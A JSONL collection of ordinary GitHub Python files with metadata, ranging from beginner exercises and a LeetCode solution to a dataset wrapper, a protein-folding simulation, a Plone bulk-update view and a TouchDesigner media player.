+{"seq_id":"42721149209","text":"import sys\r\nlist1=[12,15,19,21,4,6]\r\nl2=list1[3:5]\r\n# l2[0]=12\r\nprint(list1,l2)\r\n# print('size of two lists are {} and {}'.format(sys.getsizeof(list1),sys.getsizeof(l2)))\r\nn=12\r\nl=[]\r\nfor i in range(n):\r\n a=len(l)\r\n b=sys.getsizeof(l)\r\n\r\n print('the length is {0:3d},the bytes are {1:4d}'.format(a,b))\r\n l.append(i)","repo_name":"weifo/interview_preps","sub_path":"algorithms/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"70875434926","text":"\"\"\"\nCore data module\n\"\"\"\nimport json\nfrom pathlib import Path\nfrom typing import List, Union\n\nimport pandas as pd\nfrom datasets import Dataset as HuggingfaceDataset\nfrom indodb.exception import DataFormatNotAllowed\n\n# Allowed datatype to be converted\nTO_ALLOWED_ALL = [\"labelled_dataset\"] # Allowed in every format\nTO_ALLOWED_PANDAS: List[str] = [] # allowed to be converted to pandas\nTO_ALLOWED_HF_DATASET: List[str] = [] # allowed to be converted to hf dataset\n\n\nclass IDataset:\n \"\"\"\n IDataset class\n \"\"\"\n\n def __init__(\n self, data_id: str, data_segment: str, data_dir: Union[str, Path]\n ) -> None:\n \"\"\"\n IDataset is a class that prepare data to be used to some format\n such as Pandas, Vaex, and huggingface datasets.\n\n Use to_(x) (`pandas`) to export the data to pandas\n\n\n Parameters\n ----------\n data_id : str\n Data identifier according to the database\n data_segment : str\n Segment of the data.\n data_dir : str\n Data directory of your cache database\n \"\"\"\n self.data_id = data_id\n self.data_segment = data_segment\n self.data_path = Path(data_dir) / data_id\n\n self.parquet_file = self.data_path / f\"{data_segment}.parquet\"\n if not self.parquet_file.is_file():\n raise FileNotFoundError(f\"File {self.parquet_file} is not found!\")\n with open(self.data_path / \"metadata.json\", \"r+\", encoding=\"utf-8\") as file:\n self.metadata = json.load(file)[\"data\"]\n\n def to_pandas(self) -> pd.DataFrame:\n \"\"\"\n Export the data into pandas format\n \"\"\"\n if self.metadata.get(self.data_segment).get(\"datatype\") in TO_ALLOWED_ALL:\n parq_df = pd.read_parquet(self.parquet_file)\n else:\n raise DataFormatNotAllowed(\n f\"{self.data_id} is not allowed to be used in Pandas format.\"\n )\n return parq_df\n\n def to_hf_datasets(self) -> HuggingfaceDataset:\n \"\"\"\n Export the data into huggingface datasets\n \"\"\"\n if self.metadata.get(self.data_segment).get(\"datatype\") in TO_ALLOWED_ALL:\n parq_data: HuggingfaceDataset = HuggingfaceDataset.from_parquet(\n str(self.parquet_file)\n )\n else:\n raise DataFormatNotAllowed(\n f\"{self.data_id} is not allowed to be used in\"\n \"huggingface dataset format.\"\n )\n return parq_data\n","repo_name":"haryoa/indodb","sub_path":"indodb/data_core/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"72956611885","text":"from numpy import arange\r\nimport matplotlib.pyplot as plt\r\n\r\n# #ciljna funkcija\r\n# def objective(x):\r\n# #return (4/3)*(x1[0]**2.0+x2[0]**2.0-x1[0]*x2[0])**0.75+x3[0];\r\n# return x[0]**2.0;\r\n#\r\n# #opseg ciljne funkcije\r\n# rmin,rmax = -2.0,2.0;\r\n# inputs = arange(rmin,rmax,1.0);\r\n# #izracunati ciljeve\r\n# results = [objective([x]) for x in inputs]\r\n# #iscrtavanje\r\n# plt.plot(inputs,results);\r\n# x_opt = 0.0;\r\n# plt.axvline(x = x_opt,ls =\"--\",color = \"red\");\r\n# plt.show()\r\n\r\nn = 100;\r\ninit_tk = 10;\r\nn = [i for i in range(n)];\r\ntemperatures = [init_tk/float(i+1) for i in n];\r\nplt.plot(n,temperatures);\r\nplt.xlabel(\"Iteracije\");\r\nplt.ylabel(\"Temperature\");\r\nplt.show();\r\n","repo_name":"djordjemaljkovic/vi","sub_path":"VI/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"35916199716","text":"# Создать текстовый файл (не программно), сохранить в нем несколько строк, выполнить подсчет количества строк,\n# количества слов в каждой строке.\n\nfrom tools import get_data_from_file\n\n\ndef get_words_count(data):\n \"\"\"\n Возвращает список из числа слов в каждом элементе списка data\n Считается, что слова в каждом элементе списка data разделены пробелом\n Каждый элемент списка data является строкой\n :param data: список строк\n :type data List[str]\n :return: список из числа слов в каждой строке\n :type: List[int]\n \"\"\"\n return [len(d.split()) for d in data]\n\n\ndef main():\n \"\"\"\n Основная функция\n Выводит информацию о содержимом файла: количество строк в файле, количество слов в каждой строке файла\n Слова в файле считаются отдельными, если они разделены пробелами\n \"\"\"\n # Список строк из файла\n data = get_data_from_file('task2.txt')\n # Количество слов в каждой строке из файла\n words_count_by_row = get_words_count(data)\n\n print('Общее количество строк в файле: ', len(data))\n for row_idx, words_count in enumerate(words_count_by_row):\n print(f'Количество слов в строке {row_idx + 1}: {words_count}')\n\n\nmain()\n","repo_name":"lkamalt/python-basics","sub_path":"lesson5/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"23034015678","text":"#!/usr/bin/env python\n\n\nimport wx\n\nfrom InteractiveRecognizer import InteractiveRecognizer\nimport PyInstallerUtils\n\n\ndef main():\n app = wx.App()\n recognizerPath = PyInstallerUtils.resourcePath(\n 'recognizers/lbph_cat_faces.xml')\n cascadePath = PyInstallerUtils.resourcePath(\n # Uncomment the next argument for LBP.\n #'cascades/lbpcascade_frontalcatface.xml')\n # Uncomment the next argument for Haar with basic\n # features.\n #'cascades/haarcascade_frontalcatface.xml')\n # Uncomment the next argument for Haar with extended\n # features.\n 'cascades/haarcascade_frontalcatface_extended.xml')\n interactiveRecognizer = InteractiveRecognizer(\n recognizerPath, cascadePath,\n scaleFactor=1.2, minNeighbors=1,\n minSizeProportional=(0.125, 0.125),\n title='Interactive Cat Face Recognizer')\n interactiveRecognizer.Show()\n app.MainLoop()\n\nif __name__ == '__main__':\n main()\n","repo_name":"PacktPublishing/OpenCV-4-for-Secret-Agents-Second-Edition","sub_path":"Chapter003/InteractiveCatFaceRecognizer.py","file_name":"InteractiveCatFaceRecognizer.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"2"}
+{"seq_id":"7442054936","text":"#! /usr/bin/env/python\r\nfrom aminoacids import AminoAcid\r\nfrom random import randint,choice,random\r\nfrom math import exp\r\nfrom decimal import Decimal,getcontext\r\nfrom trajectoryAndStatistics import *\r\ngetcontext().prec=3\r\n\r\nclass Simulation:\r\n\r\n def __init__(self, chain='PHPPHPPHHPPHHPPHPPHP',K=10000,Tmax=1.0,Tmin=0.15,Tdelta=0.05,kB=1):\r\n self.chain=[AminoAcid(chain[i]) for i in range(len(chain))]\r\n self.K=K\r\n self.T=float(Tmax)\r\n self.Tmin=Decimal(Tmin)\r\n self.Tdelta=Decimal(Tdelta)\r\n self.kB=kB\r\n self.rotations=set([90,180,270])\r\n self.best=self.chain\r\n self.Hbest=0\r\n\r\n \r\n def Run(self):\r\n st=0\r\n print('Przed ruszaniem: ')\r\n for atom in self.chain:\r\n print(atom)\r\n trajectory(st,self.chain,[a.coords for a in self.chain])\r\n stats(0)\r\n Hcount=[0]\r\n while Decimal(self.T) >= self.Tmin:\r\n accepted_steps=0\r\n e_sum=0\r\n e_squared_sum=0\r\n i_sum=0\r\n st+=1\r\n print(\"temperatura \"+str(self.T))\r\n for step in range(self.K):\r\n h=0\r\n num=randint(0,len(self.chain)-2)#bo oprocz ostatniego\r\n coor=self.chain[num].coords\r\n for a in self.chain:\r\n a.SetPlace(a.coords-coor)\r\n rots=set()\r\n for l in range(3):\r\n rotate=choice(list(self.rotations-rots))\r\n rots.add(rotate)\r\n bad=False\r\n rotated=[]\r\n for a1 in self.chain:\r\n if a1.number<=num:\r\n rotated.append(a1)\r\n else:\r\n rotated.append(a1.Rotate(rotate))\r\n while not bad:\r\n for r1 in rotated:\r\n for r in rotated:\r\n if (r1)!=(r):\r\n if r.coords==r1.coords:\r\n bad=True\r\n break;\r\n if not bad:\r\n break\r\n if not bad:\r\n x=0\r\n y=0\r\n for a1 in rotated:\r\n for a2 in rotated:\r\n if a1!=a2 and rotated.index(a1)!=rotated.index(a2)-1 and rotated.index(a1)!=rotated.index(a2)+1:\r\n if a1.type=='H' and a2.type=='H':\r\n if a1.Neighbour(a2):\r\n h+=1\r\n x+=a1.coords[0]\r\n y+=a1.coords[1]\r\n h/=2\r\n if h>=Hcount[-1]:\r\n for x in range(len(self.chain[(num+1):])):\r\n self.chain[(num+1):][x].SetPlace(rotated[(num+1):][x].coords)\r\n Hcount.append(h)\r\n accepted=True\r\n else:\r\n prob=((exp(h/(self.kB*self.T)))/(exp(Hcount[-1]/(self.kB*self.T))))\r\n if random() <= prob:\r\n accepted=True\r\n else:\r\n accepted=False\r\n\r\n else:\r\n accepted=False\r\n if accepted:\r\n for x in range(len(self.chain[(num+1):])):\r\n self.chain[(num+1):][x].SetPlace(rotated[(num+1):][x].coords)\r\n Hcount.append(h)\r\n if Hcount[-1]>self.Hbest:\r\n self.Hbest=Hcount[-1]\r\n self.best=[a.coords for a in self.chain]\r\n contacts(self.T,accepted_steps,h)\r\n accepted_steps+=1\r\n e_sum+=-h\r\n e_squared_sum+=(-h)**2\r\n x/=len(self.chain)\r\n y/=len(self.chain)\r\n for a in self.chain:\r\n i_sum+=(x-a.coords[0])**2 + (y-a.coords[1])**2\r\n Hcount=Hcount[-2:]\r\n trajectory(st,self.chain,self.best)\r\n Cv=((e_squared_sum/accepted_steps)-((e_sum/accepted_steps)**2))/(self.kB*(self.T**2))\r\n I=i_sum/accepted_steps\r\n stats(self.T,Cv,I)\r\n plot_contacts(self.T)\r\n self.Hbest=0\r\n self.T=float(Decimal(self.T)-self.Tdelta)\r\n plot_stats()\r\n \r\n def __str__(self):\r\n return(str(self.atoms))\r\n \r\n def __repr__(self):\r\n return(str(self.atoms))\r\n","repo_name":"hansiu/modelo2-HPmodelSimulation","sub_path":"simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"28299556269","text":"import emoji\r\nfrom random import choice\r\nrepetir = 1\r\nprint('-' * 50)\r\nprint(' '*15 + '\\033[1;36mPEDRA, PAPEL, TESOURA\\033[m')\r\nwhile repetir == 1:\r\n print('-' * 50)\r\n jogador = int(input('\\033[1;m[0]SAIR DO JOGO' + emoji.emojize(' :heavy_multiplication_x:') + '\\n\\n[1]PEDRA' + emoji.emojize(' :baseball:') + '\\n[2]PAPEL' + emoji.emojize(' :page_facing_up:') + '\\n[3]TESOURA\\033[m' + emoji.emojize(' :scissors:')))\r\n opc = 'PEDRA', 'PAPEL', 'TESOURA'\r\n pc = choice(opc)\r\n if jogador == 0:\r\n repetir = 0\r\n print('\\n' + ' ' * 10 + '\\033[1;36mFIM DE JOGO OBRIGADO, POR JOGAR!\\033[m')\r\n elif jogador == 1 and pc == 'TESOURA' or jogador == 2 and pc == 'PEDRA' or jogador == 3 and pc == 'PAPEL':\r\n print('\\n\\033[1mO PC Escolheu {} Portanto\\033[m \\033[1;32m[VOCÊ VENCEU!]\\033[m'.format(pc))\r\n elif jogador == 1 and pc == 'PEDRA' or jogador == 2 and pc == 'PAPEL' or jogador == 3 and pc == 'TESOURA':\r\n print('\\n\\033[1mO PC Escolheu {} Portanto\\033[m \\033[1;33m[VOCÊS EMPATARAM!]\\033[m'.format(pc))\r\n else:\r\n print('\\n\\033[1mO PC Escolheu {} Portanto\\033[m \\033[1;31m[VOCÊ PERDEU!]\\033[m'.format(pc))\r\nprint('-' * 50)\r\n","repo_name":"WeDias/RespCEV","sub_path":"Exercicios-Mundo2/ex045.py","file_name":"ex045.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"22361015428","text":"from logging import getLogger\nfrom functools import partial\n\nfrom zope.component.hooks import getSite\n\n\nfrom Products.Five.browser import BrowserView\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\n\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.statusmessages.interfaces import IStatusMessage\n\nimport openpyxl\n\nfrom emrt.necd.content.browser.xls_utils import get_valid_sheet_rows\nfrom emrt.necd.content.browser.xls_utils import clean_value\n\nLOG = getLogger('emrt.necd.content.bulk_update')\n\n\ndef _read_col(row, nr):\n try:\n val = clean_value(row[nr].value)\n except IndexError:\n val = u''\n return val.strip() if val else u''\n\n\ndef _obj_from_url(context, site_url, url):\n traversable = str(url.split(site_url)[-1][1:])\n return context.unrestrictedTraverse(traversable)\n\n\ndef replace_conclusion_text(obj, text):\n conclusion = obj.get_conclusion()\n if text and conclusion:\n conclusion.text = text\n\ndef replace_description_text(obj, text):\n if text:\n obj.text = text\n\n\nclass BulkUpdateView(BrowserView):\n\n index = ViewPageTemplateFile('templates/bulk_update.pt')\n\n def __call__(self):\n return self.index()\n\n def start(self, xls):\n portal = getSite()\n wb = openpyxl.load_workbook(xls, read_only=True, data_only=True)\n sheet = wb.worksheets[0]\n\n valid_rows = get_valid_sheet_rows(sheet)\n\n context = self.context\n site_url = portal.absolute_url()\n obj_from_url = partial(_obj_from_url, context, site_url)\n catalog = getToolByName(portal, 'portal_catalog')\n\n for row in valid_rows:\n target = _read_col(row, 0)\n conclusion_text = _read_col(row, 1)\n description_text = _read_col(row, 2)\n ob = obj_from_url(target)\n replace_conclusion_text(ob, conclusion_text)\n replace_description_text(ob, description_text)\n catalog.reindexObject(ob, idxs=[\"SearchableText\"])\n\n if len(valid_rows) > 0:\n (IStatusMessage(self.request)\n .add('Bulk update successful!', type='info'))\n else:\n (IStatusMessage(self.request)\n .add('No data provided!', type='warn'))\n self.request.RESPONSE.redirect(context.absolute_url())\n","repo_name":"eea/emrt.necd.content","sub_path":"emrt/necd/content/browser/bulk_update.py","file_name":"bulk_update.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"32928085851","text":"def _make_ffmpeg_args(url: str, path: str, join: bool = False):\r\n args = [\r\n \"ffmpeg\",\r\n \"-i\",\r\n url,\r\n \"-f\",\r\n \"image2\",\r\n \"-update\",\r\n \"1\",\r\n \"-vframes\",\r\n \"1\",\r\n path,\r\n \"-y\",\r\n ]\r\n\r\n if join:\r\n args = \" \".join(args)\r\n\r\n return args\r\n","repo_name":"minibox24/twitch-thumbnail","sub_path":"twitch_thumbnail/ffmpeg.py","file_name":"ffmpeg.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"9840668755","text":"from numpy.lib.polynomial import poly1d\r\nimport numpy as np\r\nfrom scipy.integrate import quad\r\n\r\ndef horner(x, t):\r\n\r\n sol = x[0]\r\n\r\n for i in range(0, len(x)-1): # i = 0,1,2\r\n sol = sol*t + x[i+1] # x[1,2,3]\r\n return sol\r\n\r\n\r\nx = [4, 3, 2, 1] # 4x**3 + 3x**2 + 2x + 1 would be seen as: x(x(x(1) + 2) + 3) + 4\r\n# x = [1, 2, 3, 4]\r\nt = 2\r\n\r\nno_of_coeff = len(x)\r\n\r\ndegree = no_of_coeff - 1\r\n\r\npt = poly1d(x)\r\nprint(\"Polynomial given:\\n\", pt)\r\nprint(\"degree of the polynomial is: \", degree)\r\n\r\nprint(\"Solution for the given polynomial at t =\", t, \"is:\", horner(x, t)) # (a) part: solution for general equation\r\n\r\nderivative = np.polyder(pt, 1) # derivative of order 1 of pt\r\n\r\nderToPol = np.array(derivative)\r\n\r\nprint(\"Derivative for the given polynomial is:\\n\", derivative)\r\nprint(\"Solution for the derivative at t =\", t, \"is:\", horner(derToPol, t)) # (b).(i) part: first derivative of pt\r\n\r\na = 1\r\nb = 2\r\nI = quad(pt, a, b)\r\nintegration = sum(list(I))\r\n\r\nprint(\"Solution for the integration is:\", round(integration, 2)) # (b).(ii) part: first integral of pt\r\n\r\n","repo_name":"sowmya8900/DECAGT-IIIT-D-Internship","sub_path":"Practice/problem7.1_SY.py","file_name":"problem7.1_SY.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"34327434696","text":"\"\"\"The ClassificationPlot plots the `output_json` of a classification\n\n- It automatically determines the `theme` from the query args\n- It allows you to change the color\n\"\"\"\nimport panel as pn\n\nfrom paithon.base.classification import ClassificationPlot\nfrom paithon.image.image_classification import dummy_model\nfrom paithon.shared.pane.doc_string_viewer import DocStringViewer\nfrom paithon.shared.template import ACCENT_COLOR, fastlisttemplate\n\n\ndef test_classification_plot():\n \"\"\"Test of the ClassificationPlot\"\"\"\n _, _, output_json = dummy_model(None)\n plot = ClassificationPlot(\n output_json=output_json,\n color=ACCENT_COLOR,\n height=800,\n sizing_mode=\"stretch_width\",\n )\n return plot\n\n\nif __name__.startswith(\"bokeh\"):\n pn.extension(sizing_mode=\"stretch_width\")\n classification_plot = test_classification_plot()\n run_button = pn.widgets.Button(name=\"Run Classification\", button_type=\"primary\")\n\n def _run_classification(_):\n classification_plot.output_json = dummy_model(None)[2]\n\n run_button.on_click(_run_classification)\n card = pn.layout.Card(\n DocStringViewer(object=classification_plot, height=600),\n header=\"# ClassificationPlot\",\n collapsed=True,\n )\n fastlisttemplate(\n title=\"ClassificationPlot\",\n sidebar=[run_button, classification_plot.controls(jslink=False)],\n main=[card, classification_plot],\n ).servable()\n","repo_name":"MarcSkovMadsen/paithon","sub_path":"tests/apps/test_classification_plot_app.py","file_name":"test_classification_plot_app.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"}
+{"seq_id":"43712774756","text":"class Solution:\n def findNumberOfLIS(self, nums: List[int]) -> int:\n \"\"\"\n LIS means the numbers have to be strictly increasing. \n First we try to find which is LIS. Being part of which sequence is most helpful through DP.\n We also keep updating the count, if we found more than 1 sequence with the same max_len\n in the end we just return the no of sequences with the max len. \n \"\"\"\n n = len(nums)\n len_, count_ = [1]*(n), [1]*(n)\n max_=float('-inf')\n \n for i in range(n):\n for j in range(i):\n if nums[i]>nums[j]:\n if len_[j]+1>len_[i]:\n len_[i] = len_[j]+1\n count_[i] = count_[j]\n elif len_[j]+1==len_[i]:\n count_[i]+=count_[j]\n max_=max(max_, len_[i])\n \n res = 0\n for i in range(n):\n if len_[i]==max_: res+=count_[i]\n \n return res","repo_name":"amolmishra23/leetcode_solutions","sub_path":"673-number-of-longest-increasing-subsequence/673-number-of-longest-increasing-subsequence.py","file_name":"673-number-of-longest-increasing-subsequence.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"24291367411","text":"#Crie um programa crie uma progreção aritimética de 10 números. O programa pede o número inicial e a razão. Utilize um estrutura de repetição\ndef progressao(i, r):\n decimo = i + 9 * r\n for c in range(i, decimo + r, r):\n print(c, end=' ')\n print('Acabou')\n \n\ndef main():\n inicio = int(input('Digite um número inteiro qualquer que será o inicio: '))\n razao = int(input('Digite o número que será a razão: '))\n progressao(inicio, razao)\nif __name__ == \"__main__\":\n main()","repo_name":"WillamiFerreira/Curso-de-Python-Curso-em-Video","sub_path":"desafio061.py","file_name":"desafio061.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"74195021805","text":"import logging\nimport json\nimport traceback\nimport os\nfrom TDStoreTools import StorageManager\nTDF = op.TDModules.mod.TDFunctions\n\n# setup logging profile\nlogger = logging.getLogger(__name__)\n\nclass Player:\n\t''' Modular A/B player with ability to adjust number of unique decks '''\n\t\n\tdef __init__(self, ownerComp):\n\t\t\n\t\t''' operators '''\n\t\tself.ownerComp = parent()\n\t\tself.player = ownerComp\n\n\t\t''' storage manager '''\n\t\tself.PlayerStored = StorageManager(self, ownerComp, locked=False)\n\n\t\t''' attributes '''\n\t\tself.DefaultMedia = self.ownerComp.par.Defaultmedia.eval()\n\t\tself._defaultLength = 100\n\t\tself._assetPath = self.ownerComp.par.Assetpath.eval()\n\t\tself.Demomedia = os.listdir(self._assetPath)\n\n\t\t''' properties '''\n\t\tself._Crossfadeduration = tdu.Dependency(self.ownerComp.par.Crossfadeduration)\n\t\tself._Imageduration = tdu.Dependency(self.ownerComp.par.Imageduration)\n\t\t\n\t\tself._decks = self.ownerComp.par.Decks.eval()\n\t\tself.Decks = self.ownerComp.par.Decks.eval()\n\t\t\n\t\tlogger.info('Initialized...')\n\t\t\n\t@property\n\tdef Decks(self):\n\t\treturn self.ownerComp.par.Decks.eval()\n\n\t@Decks.setter\n\tdef Decks(self, value):\n\t\tif value < self._decks:\n\t\t\t[self.removeDeck(value+deck) for deck in range(self._decks-value)]\t\t\n\t\telse:\n\t\t\t[self.addDeck(deck) for deck in range(value)]\n\n\t\tself._decks = value\n\n\t@property\n\tdef Crossfadeduration(self):\n\t\treturn self._Crossfadeduration*me.time.rate\n\n\t@property\n\tdef Imageduration(self):\n\t\treturn self._Imageduration*me.time.rate\n\n\n\tdef addDeck(self, value):\n\t\t''' Update StorageManager decks '''\n\t\t\n\t\t# add item to storage manager\n\t\tself.PlayerStored._addItem({'name': 'Slot_{}'.format(value), 'default': 0})\n\n\t\n\t\tself.PlayerStored._addItem({'name': 'Deck_{}_Slot_0'.format(value), \n\t\t\t\t\t\t\t\t\t\t\t'default': {'file': self.DefaultMedia, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t'length': self._defaultLength}, \n\t\t\t\t\t\t\t\t\t\t\t'dependable': True})\n\t\n\t\tself.PlayerStored._addItem({'name': 'Deck_{}_Slot_1'.format(value), \n\t\t\t\t\t\t\t\t\t\t\t'default': {'file': self.DefaultMedia, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t'length': self._defaultLength}, \n\t\t\t\t\t\t\t\t\t\t\t'dependable': True})\n\t\t\t\t\t\t\t\t\t\t\n\t\tself.PlayerStored._sync()\n\n\tdef removeDeck(self, value):\n\n\t\tdel self.PlayerStored._items['Slot_{}'.format(value)]\n\t\tdel self.PlayerStored._items['Deck_{}_Slot_0'.format(value)]\n\t\tdel self.PlayerStored._items['Deck_{}_Slot_1'.format(value)]\n\n\t\tself.PlayerStored._sync()\n\n\n\tdef LoadMedia(self, payload):\n\t\t''' Parse 'on-demand' message message from 'Conductor' extension '''\n\n\t\ttry:\n\n\t\t\tfor key, value in payload.items():\n\n\t\t\t\t# load args\n\t\t\t\tmedia = value[0]\n\t\t\t\tdeck = value[1]\n\t\t\t\tgroup = 'deck_{}'.format(deck)\n\n\t\t\t\t# kill active run delays\n\t\t\t\tself.killRuns(group)\n\n\t\t\t\t# preload incoming media\n\t\t\t\tself.preloadMedia(group, media, deck)\n\n\t\texcept:\n\t\t\tif op.Node.Debug:\n\t\t\t\tlogger.error(traceback.format_exc()) \n\n\n\tdef preloadMedia(self, group, media, deck, playlist=None, frame=0):\n\t\t''' preload slot '''\n\n\t\ttry:\n\n\t\t\t# get next slot for deck \n\t\t\tslot = abs(getattr(self, 'Slot_{}'.format(deck))-1)\n\t\n\t\t\t# next timer / player\n\t\t\ttimer = self.ownerComp.op('deck_{}/timer_slot_{}'.format(deck,slot))\n\t\t\tplayer = self.ownerComp.op('deck_{}/mov_slot_{}'.format(deck,slot))\n\n\t\t\t# 
load remote if sent - otherwise load locally\n\t\t\tif 'http' in media:\n\t\t\t\tfilepath = media\n\t\t\telse:\n\t\t\t\t# full filepath and filetype of incoming media \n\t\t\t\tfilepath = '{}{}'.format(self._assetPath, media)\n\t\t\t\n\t\t\tfiletype = str(filepath).split('.')[-1]\n\t\t\n\t\t\t# if valid media present\n\t\t\tif media and self.validateFile(filepath, filetype):\n\t\t\t\t\n\t\t\t\t# set filepath and length attributes for next slot\n\t\t\t\tsetattr(self, \"Deck_{}_Slot_{}\".format(deck, slot), {'file' : filepath, 'length': self._defaultLength})\n\n\t\t\t\t# cue upcoming timer preload upcoming media slot\n\t\t\t\top(timer).par.cue = 1\n\t\t\t\top(player).preload()\n\n\t\t\t\t# not fully preread - run preload check\n\t\t\t\tif not op(player).isFullyPreRead:\n\t\t\t\t\trun(\"args[0](args[1], args[2], args[3], args[4], args[5], args[6])\", \n\t\t\t\t\t\tself.checkPreload, player, timer, deck, slot, group, filepath, fromOP=me, group=group, delayFrames=1)\n\t\t\t\t\n\t\t\t\t# fully preread - play media\n\t\t\t\telse:\n\t\t\t\t\tself.playMedia(deck, slot, player, timer, filepath, group)\n\t\n\t\t\telse:\n\t\t\t\tif op.Node.Debug:\n\t\t\t\t\tlogger.error('Invalid Media: {}'.format(traceback.format_exc()))\n\n\t\texcept:\n\t\t\tif op.Node.Debug:\n\t\t\t\tlogger.error(traceback.format_exc())\n\n\n\tdef checkPreload(self, player, timer, deck, slot, group, filepath, frame=1):\n\t\t''' check preload status '''\n\n\t\ttry:\n\n\t\t\t# not fully preread - rerun preload check\n\t\t\tif not op(player).isFullyPreRead:\n\t\t\t\t\n\t\t\t\t# failed preload - force play anyway - can affect output, use with caution\n\t\t\t\tif op(player).isInvalid or frame >= me.time.rate:\n\t\t\t\t\tself.playMedia(deck, slot, player, timer, filepath, group)\n\t\t\t\t\t\n\t\t\t\t\tif op.Node.Debug:\n\t\t\t\t\t\tlogger.error('Preload Failed: {}'.format(traceback.format_exc()))\n\n\t\t\t\t# re-run preload check\n\t\t\t\telse:\n\t\t\t\t\tframe+=1\n\t\t\t\t\trun(\"args[0](args[1], args[2], args[3], args[4], args[5], args[6], args[7])\", \n\t\t\t\t\t\tself.checkPreload, player, timer, deck, slot, group, filepath, frame, fromOP=me, group=group, delayFrames=1)\n\t\t\t\n\t\t\t# fully preread - play media\n\t\t\telse:\n\t\t\t\tself.playMedia(deck, slot, player, timer, filepath, group)\n\n\t\texcept:\n\t\t\tif op.Node.Debug:\n\t\t\t\tlogger.error(traceback.format_exc())\n\n\t\n\tdef playMedia(self, deck, slot, player, timer, filepath, group):\n\t\t'''play media'''\n\n\t\ttry:\n\n\t\t\t# grab file extension\n\t\t\textension = filepath.split('.')[-1]\n\n\t\t\t# set length for movie/image\n\t\t\tlength = op(player).numImages\n\t\t\trate = op(player).rate\n\t\t\tlength = length * (me.time.rate/rate)\n\t\t\tif extension in tdu.fileTypes['image']:\n\t\t\t\tlength = self.Image\n\n\t\t\t# set length\n\t\t\tsetattr(self, \"Deck_{}_Slot_{}\".format(deck, slot), {'file' : filepath, 'length': length})\n\n\t\t\t# cue deck\n\t\t\tself.ownerComp.op('deck_{}/timer_slot_{}'.format(deck, slot)).par.cue = 0\n\t\t\tself.ownerComp.op('deck_{}/timer_slot_{}'.format(deck, slot)).par.start.pulse()\n\t\t\trun(\"args[0].op('deck_{}/timer_slot_{}'.format(args[1], args[2])).par.cue = 1\", \n\t\t\t\tself.ownerComp, deck, abs(slot-1), fromOP=me, group=group, delayFrames=self._Crossfadeduration*me.time.rate)\n\n\t\t\t# swap deck slot\n\t\t\tsetattr(self, 'Slot_{}'.format(deck), slot)\n\n\t\t\tif op.Node.Debug:\n\t\t\t\tlogger.info('Playing {}'.format(filepath))\n\t\t\t\t\t\n\t\texcept:\n\t\t\tif 
op.Node.Debug:\n\t\t\t\tlogger.error(traceback.format_exc())\n\n\n\tdef validateFile(self, filepath, filetype):\n\t\t''' check media file validity '''\n\n\t\ttry:\n\t\t\t\n\t\t\tif 'http' not in filepath:\n\t\t\t\t# does it exist on local drive\n\t\t\t\tif os.path.isfile(filepath):\n\t\t\t\t\t# is it a valid image or movie file\n\t\t\t\t\tif filetype in (tdu.fileTypes['image'] + tdu.fileTypes['movie']):\n\t\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\treturn True\n\n\t\texcept:\n\t\t\tif op.Node.Debug:\n\t\t\t\tlogger.error(traceback.format_exc())\n\n\n\tdef killRuns(self, group):\n\t\t''' kill grouped runs '''\n\n\t\ttry:\n\t\t\tfor i in runs:\n\t\t\t\tif i.group == group:\n\t\t\t\t\ti.kill()\n\t\t\t\t\t# logger.info('kill: ' + str(group))\n\t\n\t\texcept:\n\t\t\tif op.Node.Debug:\n\t\t\t\tlogger.error(traceback.format_exc())\t\t\t","repo_name":"avc-choy/td-summit-2019","sub_path":"py/PlayerMod.py","file_name":"PlayerMod.py","file_ext":"py","file_size_in_byte":6996,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"2"}
